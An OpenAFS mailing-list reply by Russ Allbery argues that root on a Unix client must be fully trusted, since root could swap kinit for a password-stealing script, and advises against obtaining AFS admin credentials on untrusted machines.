[OpenAFS] Kerberos 5 cache in /tmp

[Russ Allbery]

Frederic Gilbert <Frederic.Gilbert@inria.fr> writes:

> - if you give the root password to some people, you're supposed to trust
> them (I don't agree, because root access to an AFS client is a limited
> priviledge and can be given with a lower level of confidence than e.g.
> AFS admin);

Don't obtain AFS admin credentials on any system that you don't trust and
that is run by anyone with less privileges than AFS administrator.

> - under AFS, root can steal tokens too (yes, but by having to find them
> in the kernel memory, which is a quite more complex job).

No, they don't have to do any of that.  They can just replace kinit or
klog with a script that mails them your password.

You have to completely trust root on a typical Unix box.  That's just how
it works.

> Do people here who migrated to Kerberos5 have any workaround or opinion
> about this issue, or are they living happily with it?

Living happily with it.

-- 
Russ Allbery (rra@stanford.edu)             <http://www.eyrie.org/~eagle/>